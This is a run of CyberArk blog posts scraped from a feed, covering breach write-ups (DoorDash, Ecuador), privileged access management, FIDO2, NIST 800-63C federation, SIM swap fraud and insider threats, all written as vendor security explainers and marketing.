Question two determines the importance and variance of the location, time, context, eventually resulting in determining the weight of geolocation in definition a user’s behavior. Below is a geo-distribution for an example dataset.

question 2 image

Question three determines the nature of the work that the users perform and how that can then be used to detect any anomalous behavior.

Question four establishes the role of device fingerprinting in defining users’ behavior, and based on enterprise policy, we can determine how basic/rich the levels of information we can gather for the various endpoints.

Question five guides the role of network fingerprinting in discovering & profiling users’ behavior and preferences, and will also help us in determining the sources we could go to in order to collect that information.

Questions six and seven will determine the role of gathering external threat intel from sources, which compute risk based on complementing factors such as application sessions and activities related to data access. For e.g. CASBs can give us richer visibility into applications sessions and risk associated with those.

question 6 and 7 image

After doing the due diligence of slicing and dicing, the result is a data frame with multiple instances. This can define all the key aspects potentially required to identify the behaviors of each member of the workforce accessing resources.

 

image 3

Now let’s look at how to go about getting these contexts and from which potential sources.

From the Right Sources

Identifying the right sources for these contexts is key since that will determine such things as:

  1. The attributes associated with the contexts and how coarse and fine-grain they are.
  2. The frequency at which you are able to collect this data.
  3. Scale and performance of the collection system would depend on whether you are generating this data without having any external/3rd-party dependency or integrating with an external system (such as a partner or a syslog server, for e.g.).

The figure below captures some of the potential sources that a UBA based AM solution may get relevant data to be able to extract some of the contexts mentioned above.

image 4

Cleaning the Data:

This is by far the most crucial step in the entire data processing workflow and will decide the reliability and efficiency of the model. This is a multi-step process which requires you to become completely familiar with your data and know such things as:

  1. The type of variables (Continuous, Categorical). Check out this article for more information.
  2. If Categorical, then you would have to encode it with one of the many techniques out there. This is a very critical step in data processing and careful considerations must be given to the various pros and cons that accompany the various encoding techniques. Check out this article to whet your appetite on this topic.

image5

Below is an illustration of a subset of data that Idaptive collects, which requires encoding.

image6

What’s Next?

As you can see, what started as a seemingly simple looking high-level architecture, very quickly became a bit more complex as we kept adding more dimensions to the problem at hand. Now we can start talking about reducing all the complexities introduced by all the dimensions. In Data Science parlance, that’s called dimensionality reduction and is one of the most artistic and scientific steps, all at once. We’ll look into that in the next blog of this series, in which we’ll have fun with feature selection, dimensionality reduction leveraging such techniques as Principal Component Analysis (PCA).

Part 1 in this series

Part 3 in this series

]]>
DoorDash: Remote Vendor Access Security Goes Out the Window https://www.cyberark.com/blog/doordash-when-remote-vendor-access-security-goes-out-the-window/ Tue, 01 Oct 2019 16:04:14 +0000 https://www.cyberark.com/?p=74683

DoorDash, a popular food delivery service, recently suffered a data breach exposing sensitive data for nearly 5 million customers, workers and merchants. This breach is significant both in terms of scope and the types of personal information that were poached. This includes: drivers’ licenses, credit card numbers, delivery addresses, as well the usual names, emails and phone numbers.

Like others before it, this breach was discovered months after damage had already been done. The breach was only discovered when the company noticed unusual activity from a third party service provider. This is what lies at the heart of many breaches.

Many organizations today rely on third parties, like contractors, partners or other technology and service providers, for critical IT operations. As part of this contracted work, third party vendors require remote access to sensitive internal resources. However, the current set of solutions that provide and provision proper privileged access leave much to be desired.

Since their inception in the mid-1990s, organizations have relied on Virtual Private Networks (VPNs). Unfortunately, VPNs extend network access to authenticated users and allow access to resources beyond what users need to do their jobs.

VPNs were invented before smartphones, bring-your-own-device and remote work were as commonplace and widespread as they are today. They weren’t intended to provide role-based access, which is key to limiting remote vendor access without interfering in their ability to work. A modern solution is required for this modern problem.

Understanding Remote Vendor Management

DoorDash announced that, moving forward, it would block access for unauthorized users, encourage users to change passwords and improve the security protocols that allow third party vendors to access its internal systems. However, it’s not clear, specifically, how DoorDash plans to do so.

Here are four actionable steps an organization can take to reduce the risk from remote vendor access.

  1. Implement and consistently enforce strict controls regarding who is able to access critical internal resources that house sensitive information.
  2. Enable alerting and response to anomalous behavior or activity by improving the visibility into the privilege-related events occurring in the network, such as who is accessing what resources.
  3. Implement automatic provisioning and de-provisioning processes. With this in place, third party vendors can only access the systems that they require for their jobs.
  4. Implement secure multi-factor authentication methods to verify identity of third party vendors.

Learn about securing remote vendor access without the need for VPNs, agents or passwords. Watch a video about CyberArk Alero or request a demo of CyberArk Alero. Join us on 5 November for a webinar on Alero and securing third party access.

]]>
CyberArk Privilege Cloud Now Available on AWS Marketplace https://www.cyberark.com/blog/cyberark-privilege-cloud-now-available-on-aws-marketplace/ Thu, 26 Sep 2019 13:00:34 +0000 https://www.cyberark.com/?p=74560

CyberArk is pleased to announce that our as-a-service CyberArk Privilege Cloud offering is now available on Amazon Web Services (AWS) Marketplace. CyberArk Privilege Cloud is a SaaS offering built to protect, control and monitor privileged access across on-premises, cloud and hybrid infrastructures.

Designed from the ground up for security, CyberArk Privilege Cloud helps organizations efficiently manage privileged account credentials and access rights, proactively monitor and control privileged account activity and quickly respond to threats. This added security comes without the need to manage additional on-premises infrastructure, so organizations can focus on their core competencies.

 

CyberArk Privilege Cloud: Privileged Access Management Now Available on AWS Marketplace

The availability of CyberArk Privilege Cloud marks the fourth CyberArk offering to be available on AWS Marketplace, joining Conjur Open Source, the CyberArk Privileged Access Security Solution and the CyberArk Privileged Access Security Solution for GovCloud – reinforcing the depth of the CyberArk relationship with AWS.

CyberArk is the trusted leader in privileged access management, helping the world’s leading organizations to protect against external attackers and malicious insiders in the cloud, on-premises and everywhere in between. Organizations use CyberArk solutions to protect the cloud workloads they deploy and run on AWS, securing their privileged accounts and credentials at each stage of their cloud journey.

CyberArk Privilege Cloud offers support to several powerful integrations with AWS to bolster security for organizations’ cloud assets, including the integration with the AWS Security Token Service (STS) and Amazon Inspector. CyberArk Privilege Cloud customers can also download the AWS Automatic onboarding solution from our public GitHub, which uses AWS CloudWatch events to detect newly provisioned EC2 instances and automatically onboards and manages the privileged accounts.

To check out the CyberArk solutions available for download and purchase on AWS Marketplace, click here!

]]>
In Digital Business, Don’t Sacrifice Security for Speed https://www.cyberark.com/blog/in-digital-business-dont-sacrifice-security-for-speed/ Tue, 24 Sep 2019 14:27:38 +0000 https://www.cyberark.com/?p=74499

Today’s businesses must move at the speed of innovation to remain relevant. That means embracing digital technologies and processes – from cloud computing and software-as-a-service (SaaS) models to DevOps and robotic process automation (RPA) – to help deliver products and services to market faster. But this “need for speed” and shorter feedback loops can introduce a host of new risks.

A survey of cybersecurity professionals conducted at InfoSecurity Europe 2019 underscores this problem. The study shows that 34 percent of organizations have bypassed important security steps in order to get products out to market faster. As a result, a staggering 64 percent believe that their customers could “easily be breached” as a direct result of unpatched vulnerabilities in their organizations’ products and applications. Here’s our take on some of the survey’s key findings, along with some insights from our CISO View panel of Global 1000 CISOs.

Cloud applications abound in digital businesses, but security is low priority. According to the survey, nearly half of the organizations (49 percent) are currently running more than half of their applications in the cloud. Yet many organizations are not prioritizing the protection of the applications that they deploy – or those they depend on to keep business in business.

 A recent CyberArk study shows that nearly 70 percent of organizations do not secure business critical applications, such as ERP and CRM systems, any differently than they secure low-value applications or services. As cloud applications proliferate, organizations must take steps to protect what attackers target most: privileged access. This means locking down the powerful human and application-to-application credentials used by SaaS applications and cloud-native applications built using DevOps methodologies to reduce the risk of an attack.

Security and development teams must align; application security must adapt. The vast majority of respondents (92 percent) agreed that having security test products and applications was important. However, 39 percent admitted that security is not involved at the beginning of the application development cycle.

 Traditionally, security teams could come in toward the end of the game and put up “gates” to ensure that applications were tested and met various security requirements before being released. But with the dawn of continuous application delivery, these gates are gone. Today, security teams must take the lead in aligning with DevOps teams and DevOps culture. Security teams need to work with development and operations to integrate security into modern processes from the start.

When it comes to application security testing, security teams should work to automate as many application testing and scanning processes as possible and incentivize manual testing efforts through creative initiatives like bug bounty programs. They should also conduct regular Red Team exercises to identify weaknesses that automation may miss. Check out in-depth recommendations for adapting security processes for modern application testing.

 Zero Trust can break the cycle of security failure. The InfoSecurity survey shows that 37 percent of organizations have already experienced attacks that could compromise their data and applications in the cloud. According to industry experts, nearly all cyber attacks involve privileged access. As organizations increasingly operate in cloud-first environments, access is not limited to the network and the perimeter is no longer defensible.

 This means that security strategies must shift to protecting what’s most important—from within. Zero Trust security models are making this possible. With Zero Trust, organizations trust nothing and verify everything, whether it comes from inside or outside the network perimeter, before granting access. By practicing defense-in-depth and incorporating privileged access management controls at the core of their strategy, organizations can implement a Zero Trust framework that helps to drive down risk while maintaining business velocity.

For example, the CyberArk Global Advanced Threat Landscape 2019 Report revealed that less than half of organizations have a privileged access management strategy in place for DevOps, IoT, RPA and other technologies foundational to digital initiatives. This creates a perfect opportunity for attackers to exploit legitimate privileged access.

No matter the digital transformation strategy, security must be a critical consideration from the beginning. This industry study illustrates the risks of embarking on new digital programs without a solid security foundation in place.

The CISO View report on Protecting Privileged Access in DevOps and Cloud Environments tackles many of these challenges and offers practical guidance for effectively reducing risk in modern environments—from CISOs who have been there. Download the report to learn more.

]]>
Ecuador Data Breach the Result of Cloud Vulnerability https://www.cyberark.com/blog/ecuador-data-breach-the-result-of-cloud-vulnerability/ Wed, 18 Sep 2019 13:31:38 +0000 https://www.cyberark.com/?p=74081

A recently discovered breach exposed data on almost every one of Ecuador’s approximately 17 million citizens, including 6.7 million children. Aside from the scale, this breach is making front-page news for the sheer breadth of exposed information. The exposed files contained official government ID numbers, phone numbers, family records, marriage dates, education histories and work records.

This breach was made possible by a vulnerability on an unsecured AWS Elasticsearch server – where Ecuador currently stores some of its data.  This data breach reinforces the importance of understanding the security controls a chosen cloud provider has in place and what organizations may need to do to augment those policies and procedures.

Most cloud providers operate under a shared responsibility model, where the provider handles security up to a point and, beyond that, it becomes the responsibility of those using the service. Public cloud providers provide straightforward guidance on their shared responsibility models for security and compliance in cloud environments, but the unfortunate reality is that this guidance often gets ignored.

In fact, recent data from the CyberArk annual Global Advanced Threat Landscape report found that 75% of respondents rely primarily on cloud providers’ built in security and around half of organizations don’t have a strategy in place for securing privileged data and assets in the cloud.  This represents an open door for malicious actors.

Ecuador isn’t the only government to expose its citizens’ data through an unsecured cloud server and probably won’t be the last.  A similar Elasticsearch server exposed the voter records of approximately 14.3 million people in Chile, around 80% of its population.

As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.

]]>
Go Passwordless with FIDO2 and Web Authentication https://www.cyberark.com/blog/go-passwordless-with-fido2-and-web-authentication/ Tue, 17 Sep 2019 14:41:04 +0000 https://www.cyberark.com/?p=98993

FIDO2 authentication can be used as a single (passwordless) strong authentication method, or in conjunction with a local PIN (to prevent access using a stolen key), or as a secondary authentication factor just like U2F.

Passwords are a huge pain in the a$$. They have enormous disadvantages:

  1. It’s not practical nor possible to remember complex passwords for all the services one uses, so people routinely use the same password everywhere, or worse, use guessable passwords, such as “password” or “12345”, resulting in easy account breaches.
  2. Some services require their users to change passwords frequently, causing people to create patterns, which are again, easy to guess and subsequently hacked into these accounts.
  3. People forget them and then get locked out of their accounts, which is of course a loss of productivity.
Passwordless1
Source: dilbert.com
​​​​​

Jokes apart, there are solutions like MFA on this, but along with these, strong passwordless authentication is the most convenient solution from user experience standpoint, and an important secular trend every security professional must be tracking closely.

There are several authentication methods beyond passwords that fall on different levels of security-convenience spectrum. In the last few years, smartphones have played a huge role in popularizing biometric methods like fingerprint scanning and facial recognition, but they tend to have inconsistent security profiles across platforms and devices.

For enterprise apps, you need to make sure there is guarantee of strong security for every authentication method used in every employee’s devices for every app. This is especially tricky in today’s perimeter-less and BYOD world with diverse platforms.

This is the purpose with which FIDO alliance was formed in 2013. The first version of FIDO standard called FIDO U2F, as it name suggests, was fundamentally designed as a second factor authentication method, so it can’t be used for a passwordless experience. FIDO2 is the latest set of specifications, including Web Authentication (aka WebAuthn) and CTAP2, that strive to standardize and leverage strong biometric authentication methods on different devices such as Windows Hello and Android biometric, as well as hardware tokens like Yubikey, so that users get passwordless user experience and interoperability between platforms, without losing out on convenience, privacy, and most importantly security.

In FIDO2 authentication, the biometric information from the user device or private key stored in a FIDO2 token never leaves the device, so it’s a very secure authentication method resistant to phishing and server attacks. It can be used as a single (passwordless) strong authentication method, or in conjunction with a local PIN (to prevent access using a stolen key), or as a secondary authentication factor just like U2F.

passwordless2
FIDO2 Authentication Process, Source: FIDO Alliance

It’s a work in progress though, with some platforms still catching up. Apple hasn’t yet announced its support for leveraging Face ID in CTAP2, but Safari now supports FIDO2 compliant USB keys (like Yubikey) on MacOS. Chrome, Firefox, and Edge have supported FIDO2 for a while now.

It’s quite clear that if anyone is going to kill the Thanos of identity world (the password of course), it’s going to be an interoperable and secure standard like FIDO2. Stay tuned for more updates on this soon!

]]>
Breaking the Cycle of Security Failure with Zero Trust https://www.cyberark.com/blog/breaking-the-cycle-of-security-failure-with-zero-trust/ Tue, 17 Sep 2019 13:00:33 +0000 https://www.cyberark.com/?p=74069 Zero Trust

It is widely accepted by IT security decision makers that the network perimeter is no longer defensible. Today’s technology ecosystem, made more complex by digital transformation, necessitates adjustments to traditional security strategies.

At the CyberArk Impact 2019 event in Chicago, Dr. Chase Cunningham, principal analyst at Forrester Research, delivered a compelling keynote focused on how applying Zero Trust concepts are changing the game and breaking the long-standing cycle of security failure. With Zero Trust, organizations trust nothing and verify everything, whether it comes from inside or outside their perimeters, before granting access.

As a former Navy chief with more than 19 years’ experience in cyberforensics and cyberanalytic operations, Cunningham offers direct, insightful perspectives from the front lines of cybersecurity on:

  • The current state of cybersecurity
  • Digital Transformation and the “death of the password”
  • The critical role of privileged access in enabling Zero Trust to strategically address the threat of lateral movement
  • Best practices for building out modern security architectures and capabilities that align with Zero Trust frameworks

Watch the full video here:

 

 

Learn more about Zero Trust models in our two-part blog: “The Evolution of Perimeter Security” and “The Evolution of Trust and Five Key Considerations.”

]]>
How to Secure Cloud Based Applications and Infrastructure https://www.cyberark.com/blog/best-practices-for-securing-cloud-based-applications-and-infrastructure/ Thu, 12 Sep 2019 16:13:29 +0000 https://www.cyberark.com/?p=73920

If one thing’s for certain, it’s that public cloud adoption is not going away or slowing down. Today, 94 percent of global organizations use cloud services. Sixty-one percent of public cloud users leverage Amazon Web Services (AWS,) 52 percent use Azure and 19 percent use Google Cloud – and these numbers are climbing fast. Fueled by top-down digital transformation initiatives and bottom-up pushes to streamline development processes, even heavily regulated organizations like financial services and healthcare are accelerating their adoption cycles.

Frequently, these cloud initiatives are well underway before security gets involved. But, cloud architecture and DevOps teams often lack the expertise to adequately address the risks associated with privileged access, and they often do not make security a priority given their mandate to bring new digital services to market quickly. That’s why it’s critical for security teams to collaborate in integrating security before poor practices become entrenched. (We cover this in-depth in the CISO View: Protecting Privileged Access in DevOps and Cloud Environments).

We recently hosted a webinar on best practices for securing commercial software-as-a-service (SaaS) applications, cloud infrastructure, and custom apps deployed in the cloud, which we illustrated through a series of real-world CyberArk customer use cases. Following are highlights. Tune in to the on-demand webinar for full technical details and an informative Q&A.

The Power of Privilege in the Cloud

While organizations’ infrastructures are increasingly becoming cloud-based, some things remain the same. Attackers still seek the path of least resistance and privileged access management (PAM) is still vital to securing the attack path.

The Original Way: On-Premises Cyber Attack

During a traditional on-premises breach, a cyber attacker looks for ways to compromise a user, which often starts with an attack on the endpoint. For instance, an attacker could start with phishing (who doesn’t love a great cat video?!) to get their hands on privileged credentials. Once the stolen privileged credentials are in hand, they could move laterally through the network, escalating privileges and work their way up to then owning a domain.

The New Way: Cloud Cyber Attack

In modern cloud environments, an attacker can save a number of steps by compromising one privileged user and then leverage this access to compromise, for example, a cloud management console. By hijacking these types of privileged credentials, attackers can shut down the cloud environment.

While it’s impossible to say whether the cloud is more or less secure than on-premises, misconfigurations across these open, more centralized environments can ripple in an exponential way that you don’t see in traditional deployments. So, securing privilege in the cloud has become an enterprise imperative.

New Methods for Security Cloud Infrastructure
The old (on-premises) and new (cloud) methods for executing a cyber attack

Identifying Quick Wins for Extending Privileged Access Management into the Cloud: Three Real-World CyberArk Use Cases

Use Case 1: Securing Root and Privileged Access into Cloud Management Consoles

The Situation: A global financial services institution’s cloud team deployed to AWS and Azure six months ahead of any security oversight. By the time the security team received the request to secure the new environment, workflows had already been established, making it difficult to change anything. The good news, however, was that the cloud architecture team had placed multi-factor authentication (MFA) in front of their AWS and Azure root accounts, an important security best practice.

In this multi-cloud AWS and Azure environment, every single admin member on the cloud team had their own AWS identity and access management (IAM) accounts, with mapped roles for administrative access. This translated to large number of both roles and accounts that they needed to manage. For Microsoft Azure, they were using Azure AD Connect to integrate with their on-premises Active Directory. Non-human application access into the cloud was not being managed at all.

The Challenge: The biggest challenge the security team faced was securing the cloud root accounts for AWS and Azure. In on-premises environments, securing these accounts with CyberArk would involve MFA, password rotation and enforcement. But, in cloud environments, MFA is already present and rotation happens using the UI. So, the security team initially considered two choices for automatic rotation:

  1. Use CyberArk to control and monitor access to the root account, then enable manual rotation policies and external MFA.
  2. Manage and rotate passwords within CyberArk and add customizations when the cloud provider updates the UI.

The Solution: While both of the above approaches work, this organization chose a more pragmatic approach. They used CyberArk Privileged Access Security Solution to vault their root accounts (20 total) and leveraged CyberArk as a point of access and audit control. Then they used the CyberArk solution to isolate and monitor user connections and evaluate risk. By vaulting the root account, using the native cloud MFA and implementing monthly manual rotation, the security team freed up valuable time to focus on implementing additional controls around privileged roles.

Use Case 2: Extending Password Vaulting and Rotation to Integrated Automation and Security Tools

The Situation: Application credentials typically outnumber human accounts, so controlling, managing and auditing non-human privileged access for these applications is no small feat. Two of our telecommunications customers – one a global enterprise, the other a regional provider – took a similar approach to securing the application credentials of their cloud-native apps.

Both of these organizations leveraged native secret stores provided by their cloud, DevOps and Robotic Process Automation (RPA) vendors. This led to a heavily fragmented approach and “islands of security.”  When the security team was asked to help secure these applications, the main questions were: Where exactly do these secrets live, and who is responsible for rotating them?

The good news is that both organizations were already using the CyberArk solution for their J2EE application servers. Additionally, they were using hash authentication, a powerful form of application authentication that validates whether or not an application has changed based on the hash of the entire stack or certain classes within the stack.

Challenge: Both organizations were seeking centralization, but the development teams – laser focused on high velocity, code sharing, ad-hoc tooling and full-on automation – were not interested. The new cloud security project didn’t just have to solve the problem, but most importantly, the security team had to get the developers on board.

Solution: When you have so many applications, focus becomes paramount. These organizations prioritized removing application secrets for RPA for Phase 1. This step had the advantage of cross-team visibility, adoption and the ability to achieve quick wins – useful for demonstrating benefits to developers. From there, they began the process of migrating to a shared services security model, with the end goal being that non-security teams would provide internal financing for cybersecurity projects. This had the added effect of creating cross-functional teams. By establishing cross-functional teams, they brought DevOps and security teams into alignment and fostered collaboration for stronger overall security.

Use Case 3: Scaling CyberArk Deployments in the Cloud

Situation: Brand loyalty used to be huge for cloud. This has shifted, and today, multi-cloud environments are the name of the game. One technology provider we worked with had a tri-cloud environment comprising AWS, Azure and a private cloud. Cloud usage had skyrocketed in a short period of time, leading to a huge number of accounts and instance sprawl.

Challenge: The company was onboarding the credentials for new EC2 instances and Azure VMs to CyberArk using a manual and time-consuming process. In fact, each person requesting an instance had to fill out a written form. Automation was critical – and this need was compounded by the fact that their on-premises assets were soon going away. The team turned their focus towards streamlining this process significantly.

Solution: The company leveraged the CyberArk REST API to onboard new cloud artifacts and trigger rotation and began using the same API to perform de-provisioning. As part of their privileged access management journey, they are currently evaluating additional automation and intelligence, including the auto-onboarding AWS Lambda function and the CyberArk solution’s ability to detect and onboard newly created shadow access keys and IAM accounts.

Interested in learning more about how CyberArk can help you secure cloud-based applications and cloud-based infrastructure and move your digital business forward fearlessly? Check out the full on-demand webinar.

 

]]>
NIST 800-63-C: Federated Assurance Level Guidelines https://www.cyberark.com/blog/nist-800-63-c-federated-assurance-level-guidelines/ Wed, 11 Sep 2019 15:25:21 +0000 https://www.cyberark.com/?p=99129

This is part four of a blog series on NIST 800-63c guidelines on Digital Identity. This blog focuses on part “c” of the standard – NIST 800-63c – and focuses on Federations and Assertions.

It’s taken longer than I would’ve liked, but I finally completed part four of my series on NIST-800-63-3 guidelines on Digital Identity. Part one provides an introduction and overview of the overall guidelines, part two goes in-depth into the Enrollment and Identity Proofing, while part three talks about Authentication and Lifecycle Management guidelines.

This blog focuses on part “c” of the standard – NIST 800-63c – and focuses on Federations and Assertions. As a leader in the Identity as a Service (IDaaS) market, supporting this standard effectively happens to be one of Idaptive’s strengths. This standard, and the document detailing it (like the other documents), is incredibly comprehensive and complete in its coverage of federation standards. While this blog isn’t a summary of the entire document, it focuses on a few parts of it that may be relevant to an interested newbie.

So, what really is “Federation”?

The NIST document defines federation as “a process that allows for the conveyance of authentication and subscriber attribute information across networked systems.” In simple terms, federation means the process of sending information from one system to another system (the second system trusting the first system) that “confirms” a user has been authenticated, along with other information (attributes) related to the authenticated user. The system that authenticates the user is called the Identity Provider, or IdP, and the system that trusts the IdP is called the Relying Party, or RP. The information conveyed from the IdP to the RP is often in the form of a concept called “assertion”. Information contained in the assertion is then used by the RP to determine and enforce access privileges. The authentication that happens between the user and the IdP relies on the 800-63b standard.

nist 4 image1
 Figure 1 (Source NIST-800-63-C): Anatomy of a Federation scenario 

In a federation scenario, the IdP and the RPs that consume the IdP services are referred to as members of a federation.

Assertions? ELI5 what that means…

Think of an assertion as a ‘FedEx package’ sent from the IdP to the RP (electronically, of course) that contains a variety of information about the authenticated user, along with other information that the RP can use. The primary purpose of an assertion is to authenticate the user to the RP, but the information in the assertion can be used by the RP for a variety of uses such as allowing the user to see the admin pages of the website, or personalization of the website for the user.

Federated Assurance Levels or FALs

As with the other guidelines, this document too does a great job of explaining the three levels of assurance related to Federation. Below is a table summarizing the three levels:

NIST4 image 2

Level 1 simply maps to the OpenID Connect Basic Client Profile or the Security Assertion Markup Language (SAML) Web SSO Artifact Binding profile. FAL 2 requires that the assertion (OIDC token or SAML assertion) is encrypted by a public key representing the RP. And level 3 requires that the user authenticating against the IdP does so with a cryptographic authenticator. Idaptive supports all three levels of FAL in its product with its support for the OIDC and SAML standards, ability to encrypt SAML assertions, and ability to enforce multi-factor authentication using cryptographic methods for the end user during the process of authenticating to the Idaptive IdP.

Federation Proxies – now this gets interesting!

An interesting concept explained in this blog is the idea of Federation Proxies. I’ve heard people refer to this concept in many ways – IdP Chaining, IdP Delegation, etc. Essentially, this concept refers to a scenario where communication between the IdP and the RP is intermediated via a third party that prevents direct communication between the two parties. A common way of achieving this is with a third party that acts as a federation proxy or a broker. Below is a diagram that illustrates that concept:

NIST4 image 3
 Figure 2 (Source: NIST-800-63-C): Federation Proxy 

Idaptive can be leveraged in this model, where it acts as a proxy between an IdP and a RP. In this model, the end user will still authenticate against the IdP, but her assertion will be proxied through Idaptive to the RP which will single sign the user in. Interestingly, many of our customers are starting to use this model as a way of incrementally migrating away from legacy IdPs to Idaptive. This model ensures minimal disruption to the end user since they continue authenticating to their old IdP and login portal, while ensuring that modern federation systems like Idaptive are deployed to work with their applications (RPs). Idaptive does this really well – we have the ability to dynamically chain to other IdPs based on user attributes such as username suffixes.

So, where does SAML fit in?

Now SAML, as a standard, is comprehensive enough for multiple individuals to do their PhDs in, but I’ll use this forum to very briefly introduce this concept in simple terms.

SAML, which stands for Specific Assertion Markup Language and OIDC, which stands for OpenID Connect, are two of the most common federation standards in the market. SAML is an XML framework for creating and exchanging authentication and attribute information between trusted entities over the internet. The SAML standard defines:

  • Assertions XML Schema: the structure of the assertion
  • SAML Protocols: the interaction sequences that are used to request assertions and artifacts
  • SAML Bindings: the underlying communication protocols and can be used to transport SAML assertions.

The three components above together define a SAML profile – an example of which is “Web Browser SSO” or “Service Provider (RP) Initiated SSO”. A typical SAML assertion, sent from an IdP to a RP, is encoded in XML schema and can carry three types of statements:

  • Authentication Statement: includes information about who has issued the assertion, the user for which the assertion was issued, its validity period and other authentication information.
  • Attribute Statement: includes additional information related to the user, examples of which could be “roles” or “departments”.
  • Authorization Statement: includes information on what resources the user has the rights or privileges to access, such as files, devices, web pages within a website, etc.

Looking for Federation technologies?

At Idaptive, support for federation scenarios leveraging open standards is one of the cornerstones of our cloud service since its inception. Idaptive has invested heavily in ensuring that scenarios such as IdP initiated or SP initiated SSO, or IdP Proxying or Chaining, or support for standards like SAML, OIDC, OAuth 2.0, etc., whether for workforce, partner or customer users. Additionally, we have over 2000 apps in our app catalog, many of which are SAML, OIDC and OAuth 2.0 based applications. And for applications that we do not have built-in out-of-the-box templates, you can always use our application integration wizards that will guide you through the process of customizing and enabling a new application for SSO. If you’re interested in learning more, please do not hesitate to try our service for free here or reach out to us directly.

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
“SIM Swap” and Its Effects on SMS Based Authentication https://www.cyberark.com/blog/sim-swap-and-its-effects-on-sms-based-authentication/ Tue, 10 Sep 2019 18:32:16 +0000 https://www.cyberark.com/?p=98890

Many of you might be aware of the latest, and most high-profile account takeover of Twitter chief executive Jack Dorsey, that led to a set of offensive tweets and retweets from his Twitter account. Security analysts have blamed this takeover on the so-called “SIM Swap” fraud where a hacker obtains the victim’s personal data through phishing techniques and uses this information to convince a mobile provider to switch the number associated with a SIM card to another unauthorized device. As a result, all calls and texts to the victim’s number are routed to the hacker’s phone, including SMS based one-time passwords, potentially causing people to lose control of not only their enterprise and social media accounts, but their bank accounts and other sensitive information.

SIM Swap attacks using SMS based one-time passcodes appear to be the primary reason behind many reports of fraudsters draining thousands of dollars out of victim’s checking accounts, a recent string of embarrassing Instagram takeovers, and loss of crypto currencies that have led to multi-million-dollar lawsuits. Fake tweets from prominent leaders’ accounts can have devastating consequences resulting in lasting reputation damage and loss of trust, resources, time and money. Such instances of fraud only augments why the U.S. National Institute of Standards and Technology (NIST) announced in July 2016 that organizations should no longer send one time passwords to mobile phones. Though NIST downgraded the use of SMS from “deprecated” to “restricted” in 2017, it still strongly recommends that organizations stop using SMS 2FA as this is an insecure method, relying only on the phone number and not the device itself.

As providers of centralized access to enterprise and consumer apps and resources, Identity and Access Management (IAM) vendors play a crucial role in providing controls to detect and remediate such account takeovers. To address security concerns, organizations have typically employed overly restrictive IAM controls (such as enforcing stronger password policies, knowledge-based responses, etc.) resulting in painful user experience. OTP based systems like SMS, smart phone-based codes, and FIDO based tokens were designed to improve overall user experience without compromising security but often were driven off of static rules that again impacted user experience.

While such factors offer better alternatives to SMS based authentication codes, a much better solution to address SIM Swap fraud would be an intelligent and dynamic authentication solution that can continuously analyze user and device context and require stronger factors only as needed. Such technology solutions can constantly capture the fingerprint of each enrolled device, including SIM card data, device type, geo-location information, obtain SIM porting history data (when a user activated their current SIM card or last ported their number) and carrier related data from 3rd party vendors. This rich set of data along with behavioral biometrics (passive factors such as typing speed, device orientation etc.) can then be fed into an artificial intelligence powered analytics engine that can use machine learning algorithms to assess risk based on constantly evolving user behavior patterns. Any authentication or forgotten password attempts from a SIM swapped device can flag the user as risky, prevent any subsequent authentication attempts, and alert users of fraudulent activity. For instance, when device context data mismatch highlights a low or moderate threat of SIM swap fraud, IAM systems can determine whether to deliver the one-time password via SMS or require a stronger form of verification factor like smart phone-based OTP, FIDO U2F token or altogether deny the reset password request.

Despite multiple reports of SIM Swap attacks and NIST recommendations, most organizations and users still rely on SMS authentication as their primary out-of-band authentication method for allowing secure transactions. With fraudsters continuing to exploit this weakness in SMS, employing better authentication processes with minimal impact to users is vital to improving the security posture of any organization.

Click here to learn about Idaptive’s Zero Trust approach IAM solution that verifies every user, validates their devices, and intelligently limits their access to apps and endpoints. Idaptive also utilizes machine learning to discover risky user behavior and apply conditional access — without impacting user experience.

]]>
September Is Insider Threat Awareness Month: Are You Ready? https://www.cyberark.com/blog/september-is-insider-threat-awareness-month-are-you-ready/ Tue, 10 Sep 2019 13:56:22 +0000 https://www.cyberark.com/?p=73723

The U.S. National Counterintelligence and Security Center (NSCS) and the National Insider Threat Task Force (NITTF) have declared September National Insider Threat Awareness Month. This is part of a concerted effort to educate government agencies and private sector organizations on, according to their press release, the “serious risks posed by insider threats, while encouraging employees to recognize and report anomalous activities so early intervention can occur.”

According to the Verizon Insider Threat Report, 20 percent of cybersecurity incidents and 15 percent of data breaches originated with “insiders” to the organization. While they don’t happen as frequently as external attacks, insider attacks can be extremely costly and difficult to prevent and detect.

That’s because insiders already know the network environment and often already have access to sensitive information. They can stealthily exploit privileged access to critical systems and move laterally through systems without raising any red flags. As a result, insider attacks can continue for months – or even years – before being discovered.

This new NSCS initiative is an important step in raising awareness and helping organizations develop proactive strategies for combating and detecting insider threats and reduce the risk of privilege compromise. Throughout the month, the NSCS, NITTF and partnering government agencies will host a series of events that highlight the importance of safeguarding the nation from insider threats and best practices for mitigating insider risks. Visit the Center for Development of Security Excellence to participate in cyber awareness trainings and eLearning or access informative cybersecurity resources.

Who Is the Insider Threat?

William Evanina, director of the NSCS, explained, “All organizations are vulnerable to insider threats from employees who may use their authorized access to facilities, personnel or information to harm their organizations – intentionally or unintentionally.”

While their motivations vary, CyberArk believes insider threats can typically be classified into four major groups:

  1. The External Insider. In the digital transformation age, integration with vendors and remote workers is critical. But, each of these partners – from contractors and agencies to IT service providers and attorneys – needs access to sensitive data to do their jobs. Since you can’t control what you don’t own, this creates a major gap in cybersecurity defenses: unmanaged remote vendor access can lead to negative audit findings and serious data breaches.
  2. Exploited Insider. Cyber attackers commonly target employees with privileged access like sysadmins, IT help desk teams and executives. In fact, according to the Verizon Insider Threat Report, 33 percent of breaches involve social attacks such as phishing, spoofing or reverse social engineering attacks via social media. It only takes one victim and one compromised endpoint for an attacker to establish a foothold inside an organization.
  1. The Malicious Insider. Malicious insiders are motivated by anger, financial struggles, political activism, thrill-seeking and more. They are not always easy to pinpoint, because, typically, they can bypass security measures as “trusted users” to obtain what they’re after. Their actions put enterprise and government missions, dollars – and sometimes even lives – at risk.
  1. The Unintentional Insider. Humans are, well, human. They make mistakes. Most employees are not out to steal sensitive information. They’re simply trying to do their jobs. Sometimes these employees take actions that seem harmless to them, like installing unauthorized applications or using unapproved workarounds. But, this can put put data and systems in harm’s way.

